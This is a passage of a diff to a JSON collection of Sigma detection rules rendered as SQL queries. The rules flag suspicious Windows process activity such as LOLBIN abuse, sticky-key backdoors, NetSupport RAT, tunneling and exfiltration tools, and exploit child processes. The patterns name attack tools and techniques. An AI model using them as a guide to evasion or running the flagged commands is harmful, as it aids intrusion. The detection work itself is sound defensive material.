'\\'))) AND NOT ((CommandLine LIKE '%Import-Module%' 
ESCAPE '\\' AND CommandLine LIKE '%Microsoft.VisualStudio.DevShell.dll%' ESCAPE '\\' AND CommandLine LIKE '%Enter-VsDevShell%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.WindowsTerminal\\_%' ESCAPE '\\' AND CommandLine LIKE '%\\\\LocalState\\\\settings.json%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Common7\\\\Tools\\\\VsDevCmd.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_redirection_susp_folder.yml" + "filename": "proc_creation_win_windows_terminal_susp_children.yml" }, { - "title": "Potential Commandline Obfuscation Using Escape Characters", - "id": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", + "title": "Suspicious PowerShell Invocation From Script Engines", + "id": "95eadcb2-92e4-4ed1-9031-92547773a6db", "status": "test", - "description": "Detects potential commandline obfuscation using known escape characters", - "author": "juju4", + "description": "Detects suspicious powershell invocations from interpreters or unusual programs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Microsoft Operations Manager (MOM)", + "Other scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%h^t^t^p%' ESCAPE '\\' OR CommandLine LIKE '%h\"t\"t\"p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\Health Service State\\\\%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_susp_cli_obfuscation_escape_char.yml" + "filename": "proc_creation_win_powershell_script_engine_parent.yml" }, { - "title": "Use Short Name Path in Image", - "id": "a96970af-f126-420d-90e1-d37bf25e50e1", - "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection", - "author": "frack113, Nasreddine Bencherchali", + "title": "New Service Creation Using PowerShell", + "id": "c02e96b7-c63a-4c47-bd83-4a9f74afcfb2", + "status": "test", + "description": "Detects the creation of a new service using powershell.", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." + "Legitimate administrator or user creates a service for legitimate reasons.", + "Software installation" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%~1\\\\%' ESCAPE '\\' OR Image LIKE '%~2\\\\%' ESCAPE '\\') AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR Product = 'InstallShield (R)' OR Description = 'InstallShield (R) Setup Engine' OR Company = 'InstallShield Software Corporation') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR (Image LIKE '%~1\\\\unzip.exe' ESCAPE '\\' OR Image LIKE '%~1\\\\7zG.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_ntfs_short_name_path_use_image.yml" + "filename": "proc_creation_win_powershell_create_service.yml" }, { - "title": "Potential Remote Desktop Tunneling", - "id": "8a3038e8-9c9d-46f8-b184-66234a160f6f", + "title": "New Remote Desktop Connection Initiated Via Mstsc.EXE", + "id": "954f0af7-62dd-418f-b3df-a84bc2c7a774", "status": "experimental", - "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", - "author": "Tim Rauch", + "description": "Detects the usage of \"mstsc.exe\" with the \"/v\" flag to initiate a connection to a remote server.\nAdversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). 
The adversary may then perform actions as the logged-on user.\n", + "author": "frack113", "tags": [ "attack.lateral_movement", - "attack.t1021" + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "WSL (Windows Sub System For Linux)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -L %' ESCAPE '\\' OR CommandLine LIKE '% -P %' ESCAPE '\\' OR CommandLine LIKE '% -R %' ESCAPE '\\' OR CommandLine LIKE '% -pw %' ESCAPE '\\' OR CommandLine LIKE '% -ssh %' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_susp_remote_desktop_tunneling.yml" - }, - { - "title": "TropicTrooper Campaign November 2018", - "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", - "status": "stable", - "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", - "author": "@41thexplorer, Microsoft Defender ATP", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND CommandLine LIKE '% /v:%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lxss\\\\wslhost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Microsoft\\\\WSL\\\\wslg.rdp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_tropictrooper.yml" + "filename": "proc_creation_win_mstsc_remote_connection.yml" }, { - "title": "Suspicious Msiexec Quiet Install From Remote Location", - "id": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", + "title": "Renamed NetSupport RAT Execution", 
+ "id": "0afbd410-de03-4078-8491-f132303cb67d", "status": "experimental", - "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ "Unknown" ], - "level": "medium", - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ], + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\') AND (CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\client32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_install_remote.yml" + "filename": "proc_creation_win_renamed_netsupport_rat.yml" }, { - "title": "MsiExec Web Install", - "id": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", + "title": "WScript or CScript Dropper", + "id": "cea72823-df4d-4567-950c-0b579eaf0846", "status": "test", - "description": "Detects suspicious msiexec process 
starts with web addresses as parameter", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects wscript/cscript executions of scripts located in user directories", + "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.007", - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Winzip", + "Other self-extractors" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% msiexec%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\winzip%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_web_install.yml" + "filename": "proc_creation_win_malware_script_dropper.yml" }, { - "title": "Suspicious Debugger Registration Cmdline", - "id": "ae215552-081e-44c7-805f-be16f975c8a2", - "status": "test", - "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "AgentExecutor PowerShell Execution", + "id": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", + "status": 
"experimental", + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use via Intune management. You exclude script paths and names to reduce FP rate" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" + "filename": "proc_creation_win_lolbin_agentexecutor.yml" }, { - "title": "Potential CVE-2021-40444 Exploitation Attempt", - "id": "894397c6-da03-425c-a589-3d09e7d1f750", - "status": "test", - "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", - "author": "Florian Roth (Nextron 
Systems), @neonprimetime", + "title": "Application Removed Via Wmic.EXE", + "id": "b53317a0-8acf-4fd1-8de8-a5401e776b96", + "status": "experimental", + "description": "Uninstall an application with wmic", + "author": "frac113", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%call%' ESCAPE '\\' OR CommandLine LIKE '%uninstall%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444.yml" + "filename": "proc_creation_win_wmic_uninstall_application.yml" }, { - "title": "Suspicious Shells Spawned by Java", - "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", + "title": "Detect Virtualbox Driver Installation OR Starting Of VMs", + "id": "bab049ca-7471-4828-9024-38279a4c04da", "status": "experimental", - "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Florian Roth", + "description": "Adversaries can carry out malicious operations using a virtual instance to avoid detection. 
This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.", + "author": "Janantha Marasinghe", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1564.006", + "attack.t1564" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "This may have false positives on hosts where Virtualbox is legitimately being used for operations" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%VBoxRT.dll,RTR3Init%' ESCAPE 
'\\' OR CommandLine LIKE '%VBoxC.dll%' ESCAPE '\\' OR CommandLine LIKE '%VBoxDrv.sys%' ESCAPE '\\') OR (CommandLine LIKE '%startvm%' ESCAPE '\\' OR CommandLine LIKE '%controlvm%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_java_susp_child_process.yml" + "filename": "proc_creation_win_virtualbox_execution.yml" }, { - "title": "Suspicious Serv-U Process Pattern", - "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", + "title": "Suspicious Registry Modification From ADS Via Regini.EXE", + "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", "status": "experimental", - "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", + "author": "Eli Salem, Sander Wiebing, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1555", - "cve.2021.35211" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\scriptrunner.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" ], - "filename": "proc_creation_win_servu_susp_child_process.yml" + "filename": "proc_creation_win_regini_ads.yml" }, { - "title": "Exploit for CVE-2017-8759", - "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "title": "Exfiltration and Tunneling Tools Execution", + "id": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", "status": "test", - "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", - "author": "Florian Roth (Nextron Systems)", + "description": "Execution of well known tools for data exfiltration and tunneling", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1041", + "attack.t1572", + "attack.t1071.001" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using tools" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\plink.exe' ESCAPE '\\' OR Image LIKE '%\\\\socat.exe' ESCAPE '\\' OR Image LIKE '%\\\\stunnel.exe' ESCAPE '\\' OR Image LIKE '%\\\\httptunnel.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2017_8759.yml" + "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" }, { - "title": "Suspicious Runscripthelper.exe", - "id": "eca49c87-8a75-4f13-9c73-a5a29e845f03", + "title": "Suspicious Dump64.exe 
Execution", + "id": "129966c9-de17-4334-a123-8b58172e664d", "status": "test", - "description": "Detects execution of powershell scripts via Runscripthelper.exe", - "author": "Victor Sergeev, oscd.community", + "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "author": "Austin Songer @austinsonger, Florian Roth", "tags": [ - "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dump64.exe in other folders than the excluded one" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Runscripthelper.exe' ESCAPE '\\' AND CommandLine LIKE '%surfacecheck%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_runscripthelper.yml" + "filename": "proc_creation_win_lolbin_dump64.yml" }, { - "title": "Potential PowerShell Execution Via DLL", - "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "title": "Proxy Execution Via Explorer.exe", + "id": "9eb271b9-24ae-4cd4-9465-19cfc1047f3e", "status": "test", - "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", - "author": "Markus Neis, Nasreddine Bencherchali", + "description": "Attackers can use explorer.exe for evading defense mechanisms", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218" 
], "falsepositives": [ - "Unknown" + "Legitimate explorer.exe run from cmd.exe" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%explorer.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_dll_execution.yml" + "filename": "proc_creation_win_explorer_lolbin_execution.yml" }, { - "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", - "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "title": "Sticky Key Like Backdoor Execution", + "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", "status": "test", - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", - "author": "Bhabesh Raj", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.initial_access", - "attack.execution", - 
"attack.t1190", - "attack.t1059" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" + "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" }, { - "title": 
"Potential WinAPI Calls Via CommandLine", - "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "title": "Service Registry Key Deleted Via Reg.EXE", + "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", "status": "experimental", - "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE 